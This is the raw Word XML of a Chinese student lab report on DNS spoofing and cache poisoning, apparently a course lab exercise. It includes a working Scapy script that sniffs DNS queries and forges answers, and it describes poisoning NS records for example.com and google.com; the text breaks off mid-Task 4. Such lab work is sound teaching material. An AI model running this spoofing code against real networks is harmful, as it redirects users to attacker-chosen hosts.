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07C5E" w14:textId="689031C0" w:rsidR="00691F71" w:rsidRDefault="00691F71" w:rsidP="00691F71">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00691F71">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>实验报告</w:t>
      </w:r>
      <w:r w:rsidRPr="00691F71">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED17D12" w14:textId="593C31E5" w:rsidR="00691F71" w:rsidRPr="00691F71" w:rsidRDefault="00691F71" w:rsidP="00691F71">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>7118139</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>顾宸玮</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7225A4" w14:textId="3741308E" w:rsidR="00D44311" w:rsidRDefault="00691F71" w:rsidP="00D44311">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi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Task 1: Directly Spoofifing Response to Use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189C1793" w14:textId="5925318A" w:rsidR="00691F71" w:rsidRPr="00691F71" w:rsidRDefault="00691F71" w:rsidP="00D44311">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00691F71">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>当用户在网络浏览器中输入网站名称</w:t>
      </w:r>
      <w:r w:rsidRPr="00691F71">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(主机名，如www.example.com)时，用户的计算机将向本地DNS服务器发送DNS请求，以解析主机名的IP地址。攻击者可以嗅探DNS请求消息，然后他们可以立即创建一个虚假的DNS响应，并发送回用户机器。如果虚假回复比真实回复更早到达，用户机器将接受它。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEDED37" w14:textId="26F80525" w:rsidR="00691F71" w:rsidRPr="00691F71" w:rsidRDefault="00691F71" w:rsidP="00D44311">
      <w:r w:rsidRPr="00691F71">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidRPr="00691F71">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1AC120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>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106F931D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>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236B72A3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>NS_NAME = "www.example.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C19AC68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>def spoof_dns(pkt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF7FFC7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  <w:t>if (DNS in pkt and NS_NAME in pkt[DNS].qd.qname.decode('utf-8')):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581C41A5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print(pkt.sprintf("{DNS: %IP.src% --&gt; %IP.dst%: %DNS.id%}"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0F344D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ip = IP(src=pkt[IP].dst,dst=pkt[IP].src) # Create an IP object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15565441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udp = UDP(dport=pkt[UDP].sport,sport=53) # Create a UPD object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEAF2C5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Anssec = DNSRR(rrname=pkt[DNS].qd.qname,type='A',rdata='1.2.3.4',ttl=259200) # Create an aswer record</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F702909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dns = DNS(id=pkt[DNS].id,qd=pkt[DNS].qd,aa=1,rd=0,qdcount=1,qr=1,ancount=1,an=Anssec) # Create a DNS object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE32453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spoofpkt = ip/udp/dns # Assemble the spoofed DNS packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F546E9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ab/>
      </w:r>
      <w:r w:rsidRPr="00D44311">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t>send(spoofpkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAE52C8" w14:textId="77777777" w:rsidR="00D44311" w:rsidRPr="00D44311" w:rsidRDefault="00D44311" w:rsidP="00D44311">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D44311">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>myFilter = "udp and (src host 10.9.0.5 and dst port 53)" # Set the filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16014997" w14:textId="6A5372A1" w:rsidR="00D44311" w:rsidRDefault="00D44311" w:rsidP="00D44311">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D44311">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pkt=sniff(iface='br-afcd5faa7edf', filter=myFilter, prn=spoof_dns)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E616946" w14:textId="5BB70E92" w:rsidR="00691F71" w:rsidRPr="00691F71" w:rsidRDefault="00691F71" w:rsidP="00D44311">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>在一开始测试的时候发现，dig后的结果显示并不能正确映射到1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.2.3.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>，发现可能是出现实验手册中伪造报文到达时间比正常</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>回复的消息晚到达了，所以尝试使用“</w:t>
      </w:r>
      <w:r w:rsidRPr="00691F71">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>tc qdisc add dev eth0 root netem delay 100ms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF59379" w14:textId="24F5C2DA" w:rsidR="00D44311" w:rsidRDefault="00D44311">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A43764B" wp14:editId="1B21E811">
            <wp:extent cx="3552190" cy="2287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5869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F333" w14:textId="5760C157" w:rsidR="00D44311" w:rsidRDefault="00D44311">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FE2CC65" wp14:editId="1FA6D180">
            <wp:extent cx="5274310" cy="1642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A2EC" w14:textId="70155042" w:rsidR="00FD23A3" w:rsidRPr="00691F71" w:rsidRDefault="00691F71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00691F71">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>再次运行程序：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B358EA" w14:textId="7CB4D47B" w:rsidR="00FD23A3" w:rsidRDefault="00FD23A3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FC32F85" wp14:editId="4E02B697">
            <wp:extent cx="4391025" cy="923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7117" w14:textId="0ECE9EE9" w:rsidR="00691F71" w:rsidRPr="00691F71" w:rsidRDefault="00691F71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00691F71">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>可以发现攻击成功，</w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00691F71">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:t>www</w:t>
        </w:r>
        <w:r w:rsidRPr="00691F71">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:t>.example.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00691F71">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>被映射到1</w:t>
      </w:r>
      <w:r w:rsidRPr="00691F71">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3D6547" w14:textId="44429A2E" w:rsidR="00732C73" w:rsidRDefault="00732C73">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A21B006" wp14:editId="1598493B">
            <wp:extent cx="5274310" cy="2806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E567" w14:textId="11774D4E" w:rsidR="00732C73" w:rsidRDefault="00732C73"/>
    <w:p w14:paraId="28DD553F" w14:textId="3C6E0864" w:rsidR="00732C73" w:rsidRDefault="00691F71">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Task 2: DNS Cache Poisoning Attack – Spoofifing Answers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2690353B" w14:textId="1DB939CF" w:rsidR="00732C73" w:rsidRPr="0094247A" w:rsidRDefault="00691F71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体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上述攻击的目标是用户的机器。为了实现持久的效果，每次用户的机器向</w:t>
      </w:r>
      <w:r w:rsidRPr="0094247A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>www.example.com发送DNS查询时，攻击者的机器必须发送一个欺骗的DNS响应。这可能不是很有效;有一种更好的方式来实施攻击，即针对DNS服务器，而不是用户的机器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDD39D4" w14:textId="30907CD4" w:rsidR="00732C73" w:rsidRPr="0094247A" w:rsidRDefault="00691F71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia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所以将代码改成如下形式：将嗅探的报文来源于D</w:t>
      </w:r>
      <w:r w:rsidRPr="0094247A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>NS</w:t>
      </w:r>
      <w:r w:rsidRPr="0094247A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>服务器，而非每次查询的用户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C2D1AF" w14:textId="3211A875" w:rsidR="00732C73" w:rsidRDefault="00732C73">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76B35B73" wp14:editId="3C66F3B0">
            <wp:extent cx="5274310" cy="924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695E" w14:textId="365F7517" w:rsidR="00691F71" w:rsidRDefault="00691F71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先将D</w:t>
      </w:r>
      <w:r>
        <w:t>NS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓存清除，重新进行攻击，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AFA163" w14:textId="776FA936" w:rsidR="00732C73" w:rsidRDefault="00732C73">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28EC9E32" wp14:editId="187DAD39">
            <wp:extent cx="4791075" cy="12001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73AE" w14:textId="3D58ECDB" w:rsidR="00691F71" w:rsidRPr="0094247A" w:rsidRDefault="00691F71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia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可以发现攻击成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425261DC" w14:textId="0E2988D2" w:rsidR="00732C73" w:rsidRDefault="00732C73">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C228E67" wp14:editId="4841CDD5">
            <wp:extent cx="5274310" cy="3670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902A" w14:textId="405CE281" w:rsidR="00691F71" w:rsidRPr="0094247A" w:rsidRDefault="00691F71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia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在查询</w:t>
      </w:r>
      <w:r w:rsidR="0094247A" w:rsidRPr="0094247A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="0094247A" w:rsidRPr="0094247A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>NS</w:t>
      </w:r>
      <w:r w:rsidR="0094247A" w:rsidRPr="0094247A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>缓存状态时，发现</w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="0094247A" w:rsidRPr="0094247A">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:t>w</w:t>
        </w:r>
        <w:r w:rsidR="0094247A" w:rsidRPr="0094247A">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:t>ww.example.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0094247A" w:rsidRPr="0094247A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>确实被映射到1</w:t>
      </w:r>
      <w:r w:rsidR="0094247A" w:rsidRPr="0094247A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EFCC3D" w14:textId="132CBD56" w:rsidR="00732C73" w:rsidRDefault="00732C73">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="366834DB" wp14:editId="339DEAD2">
            <wp:extent cx="5274310" cy="765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4908" w14:textId="4C463DA6" w:rsidR="00732C73" w:rsidRDefault="00732C73">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="012F2F09" wp14:editId="523A0C3E">
            <wp:extent cx="5274310" cy="1188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EE75" w14:textId="77777777" w:rsidR="00732C73" w:rsidRDefault="00732C73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="003F94F0" w14:textId="157C0D84" w:rsidR="00732C73" w:rsidRDefault="00732C73"/>
    <w:p w14:paraId="531F503A" w14:textId="0F58761B" w:rsidR="00DB48D7" w:rsidRDefault="0094247A">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Task 3: Spoofifing NS Records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372762AE" w14:textId="04C0CBDD" w:rsidR="00DB48D7" w:rsidRDefault="0094247A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体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在前面的任务中，我们的</w:t>
      </w:r>
      <w:r w:rsidRPr="0094247A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>DNS缓存中毒攻击只影响一个主机名，即www.example.com。如果用户试图获取另一个主机名的IP地址，比如mail.example.com，我们需要再次发起攻击。如果我们发起一次可以影响整个example.com域名的攻击，效率会更高。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7359A344" w14:textId="60249030" w:rsidR="0094247A" w:rsidRPr="0094247A" w:rsidRDefault="0094247A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>将代码改为如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABE7C67" w14:textId="75BC5EB9" w:rsidR="00DB48D7" w:rsidRDefault="00DB48D7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="022B91FD" wp14:editId="1F1DDAC4">
            <wp:extent cx="5274310" cy="3575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D585" w14:textId="1AC57E54" w:rsidR="0094247A" w:rsidRPr="0094247A" w:rsidRDefault="0094247A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094247A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>清除缓存后重新攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B6C008" w14:textId="50637F91" w:rsidR="00DB48D7" w:rsidRDefault="00DB48D7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A5AB2C1" wp14:editId="34888263">
            <wp:extent cx="5057775" cy="1181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C3A8" w14:textId="50D519CD" w:rsidR="0094247A" w:rsidRDefault="0094247A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以发现攻击成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD4B58C" w14:textId="1A4BB21B" w:rsidR="00DB48D7" w:rsidRDefault="00DB48D7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="771605FC" wp14:editId="0C65A4C5">
            <wp:extent cx="5274310" cy="3240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71C" w14:textId="6F02D0FF" w:rsidR="0094247A" w:rsidRDefault="0094247A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并且dig</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mail.example.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后此域名也被映射为另一个ip地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C7ED9E" w14:textId="669BB9D3" w:rsidR="00DB48D7" w:rsidRDefault="00DB48D7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F34BEF2" wp14:editId="7BE814E8">
            <wp:extent cx="5274310" cy="28003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682E" w14:textId="6C657277" w:rsidR="00DB48D7" w:rsidRDefault="00DB48D7"/>
    <w:p w14:paraId="0AE5438F" w14:textId="598A35DB" w:rsidR="00DB48D7" w:rsidRDefault="00DB48D7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2640EE93" wp14:editId="3294C2B0">
            <wp:extent cx="5274310" cy="859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CDC1" w14:textId="71C41551" w:rsidR="00DB48D7" w:rsidRDefault="00DB48D7"/>
    <w:p w14:paraId="0A72C60E" w14:textId="7024C3DA" w:rsidR="0092395D" w:rsidRDefault="0092395D"/>
    <w:p w14:paraId="4D7A67F3" w14:textId="6BF2A287" w:rsidR="0092395D" w:rsidRDefault="0092395D"/>
    <w:p w14:paraId="5651F94C" w14:textId="5771AB63" w:rsidR="0092395D" w:rsidRDefault="0094247A">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Task 4: Spoofifing NS Records for Another Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6534DD" w14:textId="09AB9736" w:rsidR="0092395D" w:rsidRDefault="0094247A">
      <w:r w:rsidRPr="0094247A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在前面的攻击中，我们成功地毒害了本地</w:t>
      </w:r>
      <w:r w:rsidRPr="0094247A">
        <w:t>DNS服务器的缓存，因此ns.attacker32.com成为example.com域的域名服务器。受此成功的启发，我们希望将其影响扩展到其他领域。也就是说，在对www.example.com的查询触发的欺骗响应中，我们想在Authority部分添加额外的条目，因此ns.attacker32.com也被用作google.com的名称服务器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D4B442" w14:textId="52724B4A" w:rsidR="0094247A" w:rsidRPr="0094247A" w:rsidRDefault="0094247A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码增加一条google</w:t>
      </w:r>
      <w:r>
        <w:t>.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的条目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D82D3E7" w14:textId="05BF3C04" w:rsidR="0092395D" w:rsidRDefault="004C5655">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16E0E45B" wp14:editId="3F6000D8">
            <wp:extent cx="5274310" cy="785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08AC" w14:textId="4165C0B6" w:rsidR="0094247A" w:rsidRDefault="0094247A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新进行攻击后，发现example</w:t>
      </w:r>
      <w:r>
        <w:t>.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
